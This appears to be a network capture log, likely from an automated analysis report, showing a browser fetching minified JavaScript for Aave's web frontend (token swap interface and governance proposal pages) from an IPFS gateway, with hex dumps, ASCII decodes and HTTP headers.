                                                                                                                                                                                                                                                  2024-09-28 04:11:57 UTC1369INData Raw: 2c 7b 63 68 61 69 6e 49 64 3a 43 2c 61 6d 6f 75 6e 74 3a 73 7d 29 2c 65 2e 6e 65 78 74 3d 32 32 2c 77 28 62 2c 43 29 3b 63 61 73 65 20 32 32 3a 72 65 74 75 72 6e 20 6c 3d 65 2e 73 65 6e 74 2c 58 28 49 65 28 49 65 28 7b 7d 2c 50 29 2c 7b 7d 2c 7b 6c 6f 61 64 69 6e 67 3a 21 30 7d 29 29 2c 65 2e 6e 65 78 74 3d 32 36 2c 4b 28 6c 29 3b 63 61 73 65 20 32 36 3a 72 65 74 75 72 6e 20 67 3d 65 2e 73 65 6e 74 2c 65 2e 6e 65 78 74 3d 32 39 2c 67 2e 77 61 69 74 28 31 29 3b 63 61 73 65 20 32 39 3a 58 28 7b 74 78 48 61 73 68 3a 67 2e 68 61 73 68 2c 6c 6f 61 64 69 6e 67 3a 21 31 2c 73 75 63 63 65 73 73 3a 21 30 7d 29 2c 4c 28 76 6f 69 64 20 30 29 2c 70 65 28 29 3b 63 61 73 65 20 33 32 3a 65 2e 6e 65 78 74 3d 33 39 3b 62 72 65 61 6b 3b 63 61 73 65 20 33 34 3a 65 2e 70 72
                                                                                                                                                                                                                                                  Data Ascii: ,{chainId:C,amount:s}),e.next=22,w(b,C);case 22:return l=e.sent,X(Ie(Ie({},P),{},{loading:!0})),e.next=26,K(l);case 26:return g=e.sent,e.next=29,g.wait(1);case 29:X({txHash:g.hash,loading:!1,success:!0}),L(void 0),pe();case 32:e.next=39;break;case 34:e.pr
                                                                                                                                                                                                                                                  2024-09-28 04:11:57 UTC1369INData Raw: 69 65 2e 6a 73 78 29 28 69 2e 63 43 2c 7b 69 64 3a 22 53 77 69 74 63 68 22 7d 29 2c 61 63 74 69 6f 6e 49 6e 50 72 6f 67 72 65 73 73 54 65 78 74 3a 28 30 2c 69 65 2e 6a 73 78 29 28 69 2e 63 43 2c 7b 69 64 3a 22 53 77 69 74 63 68 69 6e 67 22 7d 29 2c 65 72 72 6f 72 50 61 72 61 6d 73 3a 7b 6c 6f 61 64 69 6e 67 3a 21 31 2c 64 69 73 61 62 6c 65 64 3a 6c 7c 7c 21 50 2e 73 75 63 63 65 73 73 26 26 6d 65 2c 63 6f 6e 74 65 6e 74 3a 28 30 2c 69 65 2e 6a 73 78 29 28 69 2e 63 43 2c 7b 69 64 3a 22 53 77 69 74 63 68 22 7d 29 2c 68 61 6e 64 6c 65 43 6c 69 63 6b 3a 62 65 7d 2c 66 65 74 63 68 69 6e 67 44 61 74 61 3a 66 2c 62 6c 6f 63 6b 65 64 3a 6c 2c 74 72 79 50 65 72 6d 69 74 3a 63 65 7d 29 7d 2c 75 65 3d 6f 28 34 37 33 30 29 2c 42 65 3d 6f 28 31 39 34 38 35 29 2c 6b 65
                                                                                                                                                                                                                                                  Data Ascii: ie.jsx)(i.cC,{id:"Switch"}),actionInProgressText:(0,ie.jsx)(i.cC,{id:"Switching"}),errorParams:{loading:!1,disabled:l||!P.success&&me,content:(0,ie.jsx)(i.cC,{id:"Switch"}),handleClick:be},fetchingData:f,blocked:l,tryPermit:ce})},ue=o(4730),Be=o(19485),ke
                                                                                                                                                                                                                                                  2024-09-28 04:11:57 UTC1369INData Raw: 2c 72 3d 65 2e 6f 6e 53 65 6c 65 63 74 2c 67 3d 65 2e 61 73 73 65 74 73 2c 66 3d 65 2e 6d 61 78 56 61 6c 75 65 2c 43 3d 65 2e 69 73 4d 61 78 53 65 6c 65 63 74 65 64 2c 46 3d 65 2e 6c 6f 61 64 69 6e 67 2c 44 3d 76 6f 69 64 20 30 21 3d 3d 46 26 26 46 2c 45 3d 65 2e 63 68 61 69 6e 49 64 2c 49 3d 65 2e 73 65 6c 65 63 74 65 64 41 73 73 65 74 2c 70 3d 28 30 2c 77 65 2e 5a 29 28 29 2c 75 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 26 26 72 28 65 29 2c 64 26 26 64 28 22 22 29 2c 4f 28 29 7d 2c 42 3d 28 30 2c 50 65 2e 7a 29 28 29 2e 65 72 63 32 30 53 65 72 76 69 63 65 2c 79 3d 41 2e 75 73 65 53 74 61 74 65 28 6e 75 6c 6c 29 2c 52 3d 28 30 2c 78 2e 5a 29 28 79 2c 32 29 2c 55 3d 52 5b 30 5d 2c 76 3d 52 5b 31 5d 2c 53 3d 28 30 2c 41 2e 75 73 65 52 65 66 29 28 6e 75 6c
                                                                                                                                                                                                                                                  Data Ascii: ,r=e.onSelect,g=e.assets,f=e.maxValue,C=e.isMaxSelected,F=e.loading,D=void 0!==F&&F,E=e.chainId,I=e.selectedAsset,p=(0,we.Z)(),u=function(e){r&&r(e),d&&d(""),O()},B=(0,Pe.z)().erc20Service,y=A.useState(null),R=(0,x.Z)(y,2),U=R[0],v=R[1],S=(0,A.useRef)(nul
                                                                                                                                                                                                                                                  2024-09-28 04:11:57 UTC1369INData Raw: 30 2c 69 65 2e 6a 73 78 73 29 28 53 65 2e 5a 2c 7b 64 69 73 61 62 6c 65 52 69 70 70 6c 65 3a 21 30 2c 6f 6e 43 6c 69 63 6b 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 76 28 53 2e 63 75 72 72 65 6e 74 29 7d 2c 22 64 61 74 61 2d 63 79 22 3a 22 61 73 73 65 74 53 65 6c 65 63 74 22 2c 73 78 3a 7b 70 3a 30 2c 22 26 3a 68 6f 76 65 72 22 3a 7b 62 61 63 6b 67 72 6f 75 6e 64 43 6f 6c 6f 72 3a 22 74 72 61 6e 73 70 61 72 65 6e 74 22 7d 7d 2c 65 6e 64 49 63 6f 6e 3a 6a 3f 28 30 2c 69 65 2e 6a 73 78 29 28 52 65 2e 5a 2c 7b 7d 29 3a 28 30 2c 69 65 2e 6a 73 78 29 28 55 65 2e 5a 2c 7b 7d 29 2c 63 68 69 6c 64 72 65 6e 3a 5b 28 30 2c 69 65 2e 6a 73 78 29 28 5f 65 2e 55 44 2c 7b 73 79 6d 62 6f 6c 3a 49 2e 73 79 6d 62 6f 6c 2c 6c 6f 67 6f 55 52 49 3a 49 2e 6c 6f 67 6f 55 52 49 2c 73
                                                                                                                                                                                                                                                  Data Ascii: 0,ie.jsxs)(Se.Z,{disableRipple:!0,onClick:function(){v(S.current)},"data-cy":"assetSelect",sx:{p:0,"&:hover":{backgroundColor:"transparent"}},endIcon:j?(0,ie.jsx)(Re.Z,{}):(0,ie.jsx)(Ue.Z,{}),children:[(0,ie.jsx)(_e.UD,{symbol:I.symbol,logoURI:I.logoURI,s
                                                                                                                                                                                                                                                  2024-09-28 04:11:57 UTC1369INData Raw: 30 5d 2c 61 3d 73 5b 31 5d 2c 6e 3d 47 65 28 7b 63 68 61 69 6e 49 64 3a 45 2c 62 61 6c 61 6e 63 65 3a 28 30 2c 68 2e 66 6f 72 6d 61 74 55 6e 69 74 73 29 28 61 2c 6f 2e 64 65 63 69 6d 61 6c 73 29 2c 65 78 74 65 6e 73 69 6f 6e 73 3a 7b 69 73 55 73 65 72 43 75 73 74 6f 6d 3a 21 30 7d 7d 2c 6f 29 3b 5f 28 5b 6e 5d 29 7d 29 29 2e 63 61 74 63 68 28 28 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 5f 28 5b 5d 29 7d 29 29 2e 66 69 6e 61 6c 6c 79 28 28 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 58 28 21 31 29 7d 29 29 29 3a 5f 28 6f 29 7d 2c 70 6c 61 63 65 68 6f 6c 64 65 72 3a 22 53 65 61 72 63 68 20 6e 61 6d 65 20 6f 72 20 70 61 73 74 65 20 61 64 64 72 65 73 73 22 2c 64 69 73 61 62 6c 65 46 6f 63 75 73 3a 21 30 7d 29 2c 28 30 2c 69 65 2e 6a 73
                                                                                                                                                                                                                                                  Data Ascii: 0],a=s[1],n=Ge({chainId:E,balance:(0,h.formatUnits)(a,o.decimals),extensions:{isUserCustom:!0}},o);_([n])})).catch((function(){return _([])})).finally((function(){return X(!1)}))):_(o)},placeholder:"Search name or paste address",disableFocus:!0}),(0,ie.js
                                                                                                                                                                                                                                                  2024-09-28 04:11:57 UTC1369INData Raw: 7b 6d 72 3a 32 7d 7d 29 2c 28 30 2c 69 65 2e 6a 73 78 29 28 4f 65 2e 5a 2c 7b 73 78 3a 7b 66 6c 65 78 47 72 6f 77 3a 30 7d 2c 63 68 69 6c 64 72 65 6e 3a 65 2e 73 79 6d 62 6f 6c 7d 29 2c 28 6e 75 6c 6c 3d 3d 3d 28 73 3d 65 2e 65 78 74 65 6e 73 69 6f 6e 73 29 7c 7c 76 6f 69 64 20 30 3d 3d 3d 73 3f 76 6f 69 64 20 30 3a 73 2e 69 73 55 73 65 72 43 75 73 74 6f 6d 29 26 26 28 30 2c 69 65 2e 6a 73 78 29 28 4d 2e 5a 2c 7b 73 78 3a 7b 66 6f 6e 74 53 69 7a 65 3a 31 34 2c 6d 6c 3a 31 7d 2c 63 6f 6c 6f 72 3a 22 77 61 72 6e 69 6e 67 22 2c 63 68 69 6c 64 72 65 6e 3a 28 30 2c 69 65 2e 6a 73 78 29 28 6b 65 2e 5a 2c 7b 7d 29 7d 29 2c 65 2e 62 61 6c 61 6e 63 65 26 26 28 30 2c 69 65 2e 6a 73 78 29 28 47 2e 42 2c 7b 73 78 3a 7b 6d 6c 3a 22 61 75 74 6f 22 7d 2c 76 61 6c 75 65
                                                                                                                                                                                                                                                  Data Ascii: {mr:2}}),(0,ie.jsx)(Oe.Z,{sx:{flexGrow:0},children:e.symbol}),(null===(s=e.extensions)||void 0===s?void 0:s.isUserCustom)&&(0,ie.jsx)(M.Z,{sx:{fontSize:14,ml:1},color:"warning",children:(0,ie.jsx)(ke.Z,{})}),e.balance&&(0,ie.jsx)(G.B,{sx:{ml:"auto"},value
                                                                                                                                                                                                                                                  2024-09-28 04:11:57 UTC1369INData Raw: 73 74 61 6e 63 65 6f 66 20 45 72 72 6f 72 3f 28 30 2c 59 2e 61 45 29 28 73 2e 6d 65 73 73 61 67 65 29 3a 22 54 68 65 72 65 20 77 61 73 20 61 6e 20 69 73 73 75 65 20 66 65 74 63 68 69 6e 67 20 64 61 74 61 20 66 72 6f 6d 20 50 61 72 61 73 77 61 70 22 7d 29 7d 29 7d 2c 57 65 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 73 3d 65 2e 72 61 74 65 73 45 72 72 6f 72 2c 6f 3d 65 2e 62 61 6c 61 6e 63 65 2c 61 3d 65 2e 69 6e 70 75 74 41 6d 6f 75 6e 74 3b 72 65 74 75 72 6e 20 73 3f 28 30 2c 69 65 2e 6a 73 78 29 28 48 65 2c 7b 65 72 72 6f 72 3a 73 7d 29 3a 4e 75 6d 62 65 72 28 61 29 3e 4e 75 6d 62 65 72 28 6f 29 3f 28 30 2c 69 65 2e 6a 73 78 29 28 58 2e 76 2c 7b 73 65 76 65 72 69 74 79 3a 22 65 72 72 6f 72 22 2c 73 78 3a 7b 6d 74 3a 34 7d 2c 69 63 6f 6e 3a 21 31
                                                                                                                                                                                                                                                  Data Ascii: stanceof Error?(0,Y.aE)(s.message):"There was an issue fetching data from Paraswap"})})},We=function(e){var s=e.ratesError,o=e.balance,a=e.inputAmount;return s?(0,ie.jsx)(He,{error:s}):Number(a)>Number(o)?(0,ie.jsx)(X.v,{severity:"error",sx:{mt:4},icon:!1
                                                                                                                                                                                                                                                  2024-09-28 04:11:57 UTC1369INData Raw: 2c 28 30 2c 69 65 2e 6a 73 78 29 28 59 65 2e 79 2c 7b 74 69 74 6c 65 3a 28 30 2c 69 65 2e 6a 73 78 29 28 6c 2e 5a 2c 7b 76 61 72 69 61 6e 74 3a 22 63 61 70 74 69 6f 6e 22 2c 63 68 69 6c 64 72 65 6e 3a 28 30 2c 69 65 2e 6a 73 78 29 28 69 2e 63 43 2c 7b 69 64 3a 22 50 72 69 63 65 20 69 6d 70 61 63 74 22 7d 29 7d 29 2c 63 68 69 6c 64 72 65 6e 3a 28 30 2c 69 65 2e 6a 73 78 73 29 28 6d 2e 5a 2c 7b 73 78 3a 7b 64 69 73 70 6c 61 79 3a 22 66 6c 65 78 22 2c 63 75 72 73 6f 72 3a 22 70 6f 69 6e 74 65 72 22 7d 2c 63 68 69 6c 64 72 65 6e 3a 5b 28 30 2c 69 65 2e 6a 73 78 29 28 6c 2e 5a 2c 7b 76 61 72 69 61 6e 74 3a 22 63 61 70 74 69 6f 6e 22 2c 63 68 69 6c 64 72 65 6e 3a 22 28 22 7d 29 2c 28 30 2c 69 65 2e 6a 73 78 29 28 47 2e 42 2c 7b 76 61 72 69 61 6e 74 3a 22 63 61
                                                                                                                                                                                                                                                  Data Ascii: ,(0,ie.jsx)(Ye.y,{title:(0,ie.jsx)(l.Z,{variant:"caption",children:(0,ie.jsx)(i.cC,{id:"Price impact"})}),children:(0,ie.jsxs)(m.Z,{sx:{display:"flex",cursor:"pointer"},children:[(0,ie.jsx)(l.Z,{variant:"caption",children:"("}),(0,ie.jsx)(G.B,{variant:"ca
                                                                                                                                                                                                                                                  2024-09-28 04:11:57 UTC1369INData Raw: 73 70 61 72 65 6e 74 22 2c 62 61 63 6b 67 72 6f 75 6e 64 43 6f 6c 6f 72 3a 65 3d 3d 3d 73 3f 22 62 61 63 6b 67 72 6f 75 6e 64 2e 70 61 70 65 72 22 3a 22 74 72 61 6e 73 70 61 72 65 6e 74 22 7d 2c 76 61 6c 75 65 3a 65 2c 63 68 69 6c 64 72 65 6e 3a 28 30 2c 69 65 2e 6a 73 78 29 28 47 2e 42 2c 7b 76 61 6c 75 65 3a 65 2c 70 65 72 63 65 6e 74 3a 21 30 2c 76 61 72 69 61 6e 74 3a 22 73 75 62 68 65 61 64 65 72 32 22 2c 63 6f 6c 6f 72 3a 22 70 72 69 6d 61 72 79 2e 6d 61 69 6e 22 2c 73 79 6d 62 6f 6c 73 43 6f 6c 6f 72 3a 22 70 72 69 6d 61 72 79 2e 6d 61 69 6e 22 7d 29 7d 2c 65 29 7d 29 29 7d 29 7d 29 5d 7d 29 5d 7d 29 2c 28 30 2c 69 65 2e 6a 73 78 29 28 47 2e 42 2c 7b 76 61 72 69 61 6e 74 3a 22 63 61 70 74 69 6f 6e 22 2c 63 6f 6c 6f 72 3a 22 74 65 78 74 2e 70 72 69
                                                                                                                                                                                                                                                  Data Ascii: sparent",backgroundColor:e===s?"background.paper":"transparent"},value:e,children:(0,ie.jsx)(G.B,{value:e,percent:!0,variant:"subheader2",color:"primary.main",symbolsColor:"primary.main"})},e)}))})})]})]}),(0,ie.jsx)(G.B,{variant:"caption",color:"text.pri


                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                  118192.168.2.549843209.94.90.24431076C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                  2024-09-28 04:11:56 UTC762OUTGET /_next/static/chunks/pages/governance-0757370cd87e1b88.js HTTP/1.1
                                                                                                                                                                                                                                                  Host: bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.link
                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                                                                  Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                                  Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                  Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                  Referer: https://bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.link/governance/
                                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                  Cookie: __cflb=02DiuHFpDhc3YAVzwBqGVx23Wx7BLmnbsd1SxZG9bHeR2
                                                                                                                                                                                                                                                  2024-09-28 04:11:57 UTC1367INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                  Date: Sat, 28 Sep 2024 04:11:57 GMT
                                                                                                                                                                                                                                                  Content-Type: text/javascript; charset=utf-8
                                                                                                                                                                                                                                                  Content-Length: 40795
                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                  access-control-allow-headers: Content-Type
                                                                                                                                                                                                                                                  access-control-allow-headers: Range
                                                                                                                                                                                                                                                  access-control-allow-headers: User-Agent
                                                                                                                                                                                                                                                  access-control-allow-headers: X-Requested-With
                                                                                                                                                                                                                                                  access-control-allow-methods: GET
                                                                                                                                                                                                                                                  access-control-allow-methods: HEAD
                                                                                                                                                                                                                                                  access-control-allow-methods: OPTIONS
                                                                                                                                                                                                                                                  access-control-allow-origin: *
                                                                                                                                                                                                                                                  access-control-expose-headers: Content-Length
                                                                                                                                                                                                                                                  access-control-expose-headers: Content-Range
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Chunked-Output
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Ipfs-Path
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Ipfs-Roots
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Stream-Output
                                                                                                                                                                                                                                                  Cache-Control: public, max-age=29030400, immutable
                                                                                                                                                                                                                                                  etag: "bafkreifhovi3tkr7sznik34oheqx6qh6rwfmhpjh3wh2tm3c3lp7rngldi"
                                                                                                                                                                                                                                                  x-ipfs-path: /ipfs/bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy/_next/static/chunks/pages/governance-0757370cd87e1b88.js
                                                                                                                                                                                                                                                  x-ipfs-roots: bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy,bafybeibkk2t3wa2shw62jhntzsugx2oh7gf6zlbu3gb6gdxmeuwt6wi6se,bafybeihww4l5iuauf4leipzwanhudgpdxwdltpxcn6hqqud65jpcaq33xe,bafybeigaj3cwdjktvw36akiq43niv2siihkxaslemvv33lw5mhruragm5a,bafybeiarzqpstoo26we45swmenr4cty2xldwzxkk3de3tw2jrdlwkngi2a,bafkreifhovi3tkr7sznik34oheqx6qh6rwfmhpjh3wh2tm3c3lp7rngldi
                                                                                                                                                                                                                                                  2024-09-28 04:11:57 UTC137INData Raw: 78 2d 69 70 66 73 2d 70 6f 70 3a 20 72 61 69 6e 62 6f 77 2d 64 63 31 33 2d 31 30 0d 0a 43 46 2d 43 61 63 68 65 2d 53 74 61 74 75 73 3a 20 48 49 54 0d 0a 41 67 65 3a 20 39 38 37 35 30 0d 0a 41 63 63 65 70 74 2d 52 61 6e 67 65 73 3a 20 62 79 74 65 73 0d 0a 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 63 61 30 65 34 37 31 63 61 65 64 31 37 62 31 2d 45 57 52 0d 0a 0d 0a
                                                                                                                                                                                                                                                  Data Ascii: x-ipfs-pop: rainbow-dc13-10CF-Cache-Status: HITAge: 98750Accept-Ranges: bytesServer: cloudflareCF-RAY: 8ca0e471caed17b1-EWR
                                                                                                                                                                                                                                                  2024-09-28 04:11:57 UTC1234INData Raw: 28 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 4e 5f 45 3d 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 4e 5f 45 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 34 33 34 35 5d 2c 7b 38 34 31 31 30 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 65 78 70 6f 72 74 73 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 72 29 7b 65 3d 65 7c 7c 7b 7d 3b 76 61 72 20 6e 3d 74 2e 70 72 6f 74 6f 74 79 70 65 2c 6f 3d 7b 66 75 74 75 72 65 3a 22 69 6e 20 25 73 22 2c 70 61 73 74 3a 22 25 73 20 61 67 6f 22 2c 73 3a 22 61 20 66 65 77 20 73 65 63 6f 6e 64 73 22 2c 6d 3a 22 61 20 6d 69 6e 75 74 65 22 2c 6d 6d 3a 22 25 64 20 6d 69 6e 75 74 65 73 22 2c 68 3a 22 61 6e 20 68 6f 75 72 22
                                                                                                                                                                                                                                                  Data Ascii: (self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[4345],{84110:function(e){e.exports=function(){"use strict";return function(e,t,r){e=e||{};var n=t.prototype,o={future:"in %s",past:"%s ago",s:"a few seconds",m:"a minute",mm:"%d minutes",h:"an hour"
                                                                                                                                                                                                                                                  2024-09-28 04:11:57 UTC1369INData Raw: 2e 66 72 6f 6d 4e 6f 77 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 66 72 6f 6d 28 69 28 74 68 69 73 29 2c 65 29 7d 7d 7d 28 29 7d 2c 32 35 32 32 34 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 72 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 72 2e 72 28 74 29 2c 72 2e 64 28 74 2c 7b 64 65 66 61 75 6c 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 46 65 7d 7d 29 3b 76 61 72 20 6e 3d 72 28 34 39 35 30 31 29 2c 6f 3d 72 28 36 32 30 39 37 29 2c 73 3d 72 28 36 31 32 32 35 29 2c 69 3d 72 28 32 39 36 33 30 29 2c 61 3d 72 28 37 39 30 37 32 29 2c 6c 3d 72 28 35 31 35 32 29 2c 63 3d 72 28 36 37 32 39 34 29 2c 64 3d 72 28 33 34 36 33 37 29 2c 75 3d 72 28 35 39 33 37 39 29 2c 70 3d 72 28 37 30 36 37 35 29 2c 68 3d 72 28 37 35
                                                                                                                                                                                                                                                  Data Ascii: .fromNow=function(e){return this.from(i(this),e)}}}()},25224:function(e,t,r){"use strict";r.r(t),r.d(t,{default:function(){return Fe}});var n=r(49501),o=r(62097),s=r(61225),i=r(29630),a=r(79072),l=r(5152),c=r(67294),d=r(34637),u=r(59379),p=r(70675),h=r(75
                                                                                                                                                                                                                                                  2024-09-28 04:11:57 UTC1369INData Raw: 63 68 69 6c 64 72 65 6e 3a 5b 28 30 2c 50 2e 6a 73 78 29 28 6e 2e 63 43 2c 7b 69 64 3a 22 41 61 76 65 20 69 73 20 61 20 66 75 6c 6c 79 20 64 65 63 65 6e 74 72 61 6c 69 7a 65 64 2c 20 63 6f 6d 6d 75 6e 69 74 79 20 67 6f 76 65 72 6e 65 64 20 70 72 6f 74 6f 63 6f 6c 20 62 79 20 74 68 65 20 41 41 56 45 20 74 6f 6b 65 6e 2d 68 6f 6c 64 65 72 73 2e 20 41 41 56 45 20 74 6f 6b 65 6e 2d 68 6f 6c 64 65 72 73 20 63 6f 6c 6c 65 63 74 69 76 65 6c 79 20 64 69 73 63 75 73 73 2c 20 70 72 6f 70 6f 73 65 2c 20 61 6e 64 20 76 6f 74 65 20 6f 6e 20 75 70 67 72 61 64 65 73 20 74 6f 20 74 68 65 20 70 72 6f 74 6f 63 6f 6c 2e 20 41 41 56 45 20 74 6f 6b 65 6e 2d 68 6f 6c 64 65 72 73 20 28 45 74 68 65 72 65 75 6d 20 6e 65 74 77 6f 72 6b 20 6f 6e 6c 79 29 20 63 61 6e 20 65 69 74 68
                                                                                                                                                                                                                                                  Data Ascii: children:[(0,P.jsx)(n.cC,{id:"Aave is a fully decentralized, community governed protocol by the AAVE token-holders. AAVE token-holders collectively discuss, propose, and vote on upgrades to the protocol. AAVE token-holders (Ethereum network only) can eith
                                                                                                                                                                                                                                                  2024-09-28 04:11:57 UTC1369INData Raw: 20 74 3d 28 30 2c 47 2e 7a 29 28 29 2c 72 3d 74 2e 76 6f 74 69 6e 67 4d 61 63 68 69 6e 65 53 65 72 69 76 63 65 2c 6e 3d 74 2e 67 6f 76 65 72 6e 61 6e 63 65 56 33 53 65 72 76 69 63 65 2c 6f 3d 65 2e 74 72 69 6d 28 29 2e 73 70 6c 69 74 28 22 20 22 29 2e 6a 6f 69 6e 28 22 20 26 20 22 29 2c 73 3d 28 30 2c 46 2e 61 29 28 7b 71 75 65 72 79 46 6e 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 28 30 2c 56 2e 5a 50 29 28 42 2e 42 32 2e 67 6f 76 65 72 6e 61 6e 63 65 43 6f 72 65 53 75 62 67 72 61 70 68 55 72 6c 2c 57 2c 7b 71 75 65 72 79 3a 65 2c 66 69 72 73 74 3a 31 30 7d 29 7d 28 6f 29 7d 2c 65 6e 61 62 6c 65 64 3a 22 22 21 3d 3d 65 2c 71 75 65 72 79 4b 65 79 3a 5b 22 73 65 61 72 63 68 50 72 6f 70 6f
                                                                                                                                                                                                                                                  Data Ascii: t=(0,G.z)(),r=t.votingMachineSerivce,n=t.governanceV3Service,o=e.trim().split(" ").join(" & "),s=(0,F.a)({queryFn:function(){return function(e){return(0,V.ZP)(B.B2.governanceCoreSubgraphUrl,W,{query:e,first:10})}(o)},enabled:""!==e,queryKey:["searchPropo
                                                                                                                                                                                                                                                  2024-09-28 04:11:57 UTC1369INData Raw: 29 7b 72 65 74 75 72 6e 28 30 2c 50 2e 6a 73 78 29 28 71 2e 5a 2c 7b 76 61 6c 75 65 3a 65 2c 63 68 69 6c 64 72 65 6e 3a 65 7d 2c 65 29 7d 29 29 5d 7d 29 2c 28 30 2c 50 2e 6a 73 78 29 28 55 2e 4d 2c 7b 77 72 61 70 70 65 72 53 78 3a 7b 77 69 64 74 68 3a 22 32 38 30 70 78 22 7d 2c 70 6c 61 63 65 68 6f 6c 64 65 72 3a 22 53 65 61 72 63 68 20 70 72 6f 70 6f 73 61 6c 73 22 2c 6f 6e 53 65 61 72 63 68 54 65 72 6d 43 68 61 6e 67 65 3a 72 7d 29 5d 7d 29 7d 2c 51 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 65 2e 70 72 6f 70 6f 73 61 6c 46 69 6c 74 65 72 2c 72 3d 65 2e 68 61 6e 64 6c 65 43 68 61 6e 67 65 2c 6f 3d 65 2e 68 61 6e 64 6c 65 53 65 61 72 63 68 51 75 65 72 79 43 68 61 6e 67 65 3b 72 65 74 75 72 6e 28 30 2c 50 2e 6a 73 78 73 29 28 50 2e 46 72 61
                                                                                                                                                                                                                                                  Data Ascii: ){return(0,P.jsx)(q.Z,{value:e,children:e},e)}))]}),(0,P.jsx)(U.M,{wrapperSx:{width:"280px"},placeholder:"Search proposals",onSearchTermChange:r})]})},Q=function(e){var t=e.proposalFilter,r=e.handleChange,o=e.handleSearchQueryChange;return(0,P.jsxs)(P.Fra
                                                                                                                                                                                                                                                  2024-09-28 04:11:57 UTC1369INData Raw: 3a 6e 7d 29 7d 29 7d 2c 4a 3d 72 28 32 37 34 38 34 29 2c 65 65 3d 72 2e 6e 28 4a 29 2c 74 65 3d 72 28 38 34 31 31 30 29 2c 72 65 3d 72 2e 6e 28 74 65 29 2c 6e 65 3d 72 28 37 34 36 36 33 29 3b 65 65 28 29 2e 65 78 74 65 6e 64 28 72 65 28 29 29 3b 76 61 72 20 6f 65 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 65 2e 70 72 6f 70 6f 73 61 6c 2c 72 3d 28 30 2c 62 2e 59 29 28 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 65 2e 74 72 61 63 6b 45 76 65 6e 74 7d 29 29 3b 72 65 74 75 72 6e 28 30 2c 50 2e 6a 73 78 73 29 28 76 2e 5a 2c 7b 73 78 3a 7b 70 3a 36 2c 64 69 73 70 6c 61 79 3a 22 66 6c 65 78 22 2c 66 6c 65 78 57 72 61 70 3a 22 77 72 61 70 22 2c 6a 75 73 74 69 66 79 43 6f 6e 74 65 6e 74 3a 22 73 70 61 63 65 2d 62 65 74 77 65 65 6e 22
                                                                                                                                                                                                                                                  Data Ascii: :n})})},J=r(27484),ee=r.n(J),te=r(84110),re=r.n(te),ne=r(74663);ee().extend(re());var oe=function(e){var t=e.proposal,r=(0,b.Y)((function(e){return e.trackEvent}));return(0,P.jsxs)(v.Z,{sx:{p:6,display:"flex",flexWrap:"wrap",justifyContent:"space-between"
